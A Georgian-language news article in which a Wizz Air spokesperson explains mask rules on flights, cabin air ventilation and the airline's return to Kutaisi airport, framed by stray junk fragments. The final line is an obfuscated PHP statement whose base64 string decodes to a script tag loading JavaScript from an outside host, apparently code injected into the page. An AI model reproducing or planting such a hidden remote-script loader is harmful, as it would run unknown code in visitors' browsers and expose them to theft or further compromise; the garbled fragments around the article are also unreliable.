celsiusi
ავერსი შნაიდერი
ავიაკომპანია ჭიზზ Aირ- ის კორპორატიული კომუნიკაციების ხელმძღვანელმა, ანდრაშ რადომ საქართველოს პირველ არხთან საუბარისას ის წესები განმარტა, რომელთა დაცვაც მგზავრებს მოუწევთ.
 
როგორც ანდრაშ რადო აცხადებს, აუცილებელი მოთხოვნაა, მგზავრებს ეკეთოთ პირბადე და ფრენის განმავლობაში არ მოიხსნან. მხოლოდ დამცავი ფარით მგზავრები რეისზე არ დაიშვებიან. მგზავრობისას პირბადე უნდა ეკეთოთ ორი წლის ასაკის ზემოთ მყოფ ბავშვებსაც. მგზავრებს ექნებათ უფლება, დასხდნენ ყველა თავისუფალ სკამზე.
 
„პირბადის გარეშე მგზავრობის გამონაკლისი შემთხვევებიც შეიძლება იყოს. ამ შემთხვევაში აუცილებელია, ოფიციალური დოკუმენტის წარდგენა და ეს უნდა იყოს მნიშვნელოვანი მიზეზი. მგზავრმა უნდა დაადასტუროს, რატომ ვერ ატარებს პირბადეს. ჩვენ ვცდილობთ, დავიცვათ ჩვენი თავი და მგზავრებიც. ეს ჩვენი საერთო პასუხისმგებლობაა, ვატაროთ პირბადე და დავიცვათ ერთმანეთი“, – განაცხადა ანდრაშ რადომ, რომლის თქმითაც, ფრენა უსაფრთხოა, რასაც სავენტილაციო სისტემა უზრუნველყოფს.
 
„ეკიპაჟის წევრებს ეკეთებათ პირბადეც და ხელთათმანიც. მოხდება თვითმფრინავის დეზინფექცია. ჩვენს სავენტილაციო სისტემაში ჰაერი მუდმივად იცვლება, საათში ოცჯერ. ჰაერი თვითმფრინავში ძალიან სუფთაა. რაც შეეხება სხვადასხვა ქვეყნის წესებს, ისინი განსხვავებულია. ზოგიერთ ქვეყენაში არ არის აუცილებელი პირბადის ტარება ღია სივრცეში, მაგრამ შიდა სივრცეში აუცილებელია. ვურჩევდი მგზავრებს, გამომგზავრებამდე გაეცნონ კონკრეტული ქვეყნების წესებს, რათა მზად იყვენენ. ვფიქრობ, ქვეყნების უმეტესობა შეზღუდვებს ამსუბუქებს, არ მგონია, რომ საქართველოსთან შედარებით, სხვა ქვეყნების უმრავლესობაში დიდად განსხვავებული წესები იყოს“, – განაცხადა კომპანიის წარმომადგენელმა.
 
გუშინ ცნობილი გახდა, რომ ჭიზზ Aირ-ის ბაზა ქუთაისის აეროპორტში პირველი ივლისიდან ბრუნდება და პირდაპირ რეისებს ექვსი მიმართულებით შეასრულებს.
 
როგორც ანდრაშ რადომ აღნიშნა, თვითმფრინავის ქუთაისის ბაზაზე განთავსების შემდეგ ექვს მიმართულებას დაემატება კიდევ შვიდი მიმართულება.
 
მისივე თქმით, როდესაც მოთხოვნა გაიზრდება და სხვა ქვეყნებშიც შემსუბუქდება შეზღუდვები, გაიზრდება ფრენების სიხშირეც.
1251
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");